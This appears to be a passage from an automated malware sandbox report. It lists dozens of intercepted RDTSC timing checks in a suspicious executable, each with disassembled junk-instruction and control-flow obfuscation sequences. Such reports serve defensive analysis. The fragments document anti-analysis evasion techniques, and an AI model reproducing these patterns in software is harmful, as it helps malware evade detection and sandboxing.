Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F50F64 second address: F50F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D690EF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F50F7C second address: F50F9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8E2D68FC67h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F50F9E second address: F50FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F52F5F second address: F52F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F50FA4 second address: F50FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F52F63 second address: F52F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F510B1 second address: F510BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F8E2D690EE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F53FF4 second address: F53FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F53FF8 second address: F54002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F54002 second address: F54006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F55090 second address: F550EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d mov edx, edi 0x0000000f popad 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F8E2D690EE8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov edi, 74113260h 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 push edi 0x00000037 jmp 00007F8E2D690EF5h 0x0000003c pop edi 0x0000003d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F560B6 second address: F560BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F560BA second address: F560BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F560BE second address: F560C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F56165 second address: F56169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F56169 second address: F5616F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5616F second address: F56175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5526A second address: F5530C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F8E2D68FC58h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D2BC7h], esi 0x00000029 push dword ptr fs:[00000000h] 0x00000030 jmp 00007F8E2D68FC68h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c push 00000000h 0x0000003e push edi 0x0000003f call 00007F8E2D68FC58h 0x00000044 pop edi 0x00000045 mov dword ptr [esp+04h], edi 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc edi 0x00000052 push edi 0x00000053 ret 0x00000054 pop edi 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D238Ah], esi 0x0000005c mov eax, dword ptr [ebp+122D054Dh] 0x00000062 add dword ptr [ebp+122D2881h], edx 0x00000068 mov ebx, dword ptr [ebp+122D30EBh] 0x0000006e push FFFFFFFFh 0x00000070 sub dword ptr [ebp+122D1CD0h], edx 0x00000076 mov di, si 0x00000079 nop 0x0000007a pushad 0x0000007b pushad 0x0000007c push esi 0x0000007d pop esi 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F57133 second address: F5713A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5713A second address: F57140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5530C second address: F5532C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8E2D690EEDh 0x0000000b jng 00007F8E2D690EE6h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F57140 second address: F57144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5532C second address: F55334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F572EF second address: F572F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F582AD second address: F582B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8E2D690EE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F58359 second address: F58375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC67h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5A145 second address: F5A149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5A149 second address: F5A152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F5A152 second address: F5A19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8E2D690EE6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F8E2D690EE8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push 00000000h 0x0000002b add edi, 3B39CB81h 0x00000031 push 00000000h 0x00000033 mov bx, B8DDh 0x00000037 xchg eax, esi 0x00000038 jo 00007F8E2D690EF0h 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 pop esi 0x00000042 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F621F3 second address: F621FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F621FF second address: F62217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F8E2D690EEAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6232D second address: F62362 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8E2D68FC5Ch 0x00000008 pop edi 0x00000009 jmp 00007F8E2D68FC5Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jbe 00007F8E2D68FC56h 0x00000019 jo 00007F8E2D68FC56h 0x0000001f jne 00007F8E2D68FC56h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F62362 second address: F62377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8E2D690EF0h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F626B2 second address: F626D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC69h 0x00000007 jc 00007F8E2D68FC56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F626D5 second address: F626DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8E2D690EE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F68564 second address: F68569 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F68569 second address: F6856F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6856F second address: F68591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC63h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F8E2D68FC56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F68D25 second address: F68D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F68D2B second address: F68D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E0DB second address: F6E0E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F8E2D690EE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E22A second address: F6E230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E230 second address: F6E243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8E2D690EEDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E3E1 second address: F6E3EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E67E second address: F6E686 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E686 second address: F6E69B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC61h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E69B second address: F6E6C2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8E2D690EE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8E2D690EF9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E6C2 second address: F6E6C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E81C second address: F6E820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E99E second address: F6E9A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6E9A3 second address: F6E9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6EB42 second address: F6EB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8E2D68FC56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F6EB4E second address: F6EB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007F8E2D690EE6h 0x0000000e jl 00007F8E2D690EE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: EFA53F second address: EFA544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: EFA544 second address: EFA550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F8E2D690EE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: EFA550 second address: EFA559 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F465DD second address: F465E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F465E2 second address: F24E56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, dword ptr [ebp+122D21BBh] 0x00000013 call dword ptr [ebp+122D3629h] 0x00000019 pushad 0x0000001a jbe 00007F8E2D68FC58h 0x00000020 push edi 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F467A2 second address: F467A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F467A6 second address: F467AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F46AC9 second address: F46ADF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8E2D690EE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007F8E2D690EF0h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F46B78 second address: F46BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007F8E2D68FC6Fh 0x0000000b jmp 00007F8E2D68FC69h 0x00000010 popad 0x00000011 push eax 0x00000012 push esi 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F46BA2 second address: F46BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b js 00007F8E2D690EE8h 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop ecx 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push edx 0x0000001b jmp 00007F8E2D690EEEh 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F8E2D690EEAh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F46BDE second address: F46BE8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8E2D68FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F46BE8 second address: F46C3B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnp 00007F8E2D690EE6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F8E2D690EE8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ecx, dword ptr [ebp+122D27CBh] 0x0000002d call 00007F8E2D690EE9h 0x00000032 jmp 00007F8E2D690EEAh 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jl 00007F8E2D690EE8h 0x00000040 push edx 0x00000041 pop edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F46C3B second address: F46C8A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8E2D68FC5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnp 00007F8E2D68FC6Ch 0x00000014 mov eax, dword ptr [eax] 0x00000016 jnc 00007F8E2D68FC60h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 jp 00007F8E2D68FC64h 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F46E5E second address: F46E70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F46E70 second address: F46E7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8E2D68FC56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F470BC second address: F470C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F470C8 second address: F470CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F470CC second address: F470D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4750E second address: F47518 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8E2D68FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F4775B second address: F477B4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8E2D690EECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jmp 00007F8E2D690EF4h 0x00000012 pop eax 0x00000013 push ecx 0x00000014 jmp 00007F8E2D690EEFh 0x00000019 pop ecx 0x0000001a popad 0x0000001b nop 0x0000001c mov edx, dword ptr [ebp+122D386Dh] 0x00000022 lea eax, dword ptr [ebp+1248C336h] 0x00000028 mov edi, dword ptr [ebp+122D2F3Dh] 0x0000002e mov ecx, edi 0x00000030 nop 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jnl 00007F8E2D690EE6h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F477B4 second address: F477B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F477B8 second address: F477C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edi 0x00000009 jc 00007F8E2D690EECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F72595 second address: F72599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F72599 second address: F7259D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F7259D second address: F725AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F728B8 second address: F728BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F72C44 second address: F72C4E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8E2D68FC56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F72D9A second address: F72DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D690EF1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F72DB4 second address: F72DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F72DC0 second address: F72DD0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F72DD0 second address: F72DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC5Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: F764DA second address: F7651B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F8E2D690F14h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
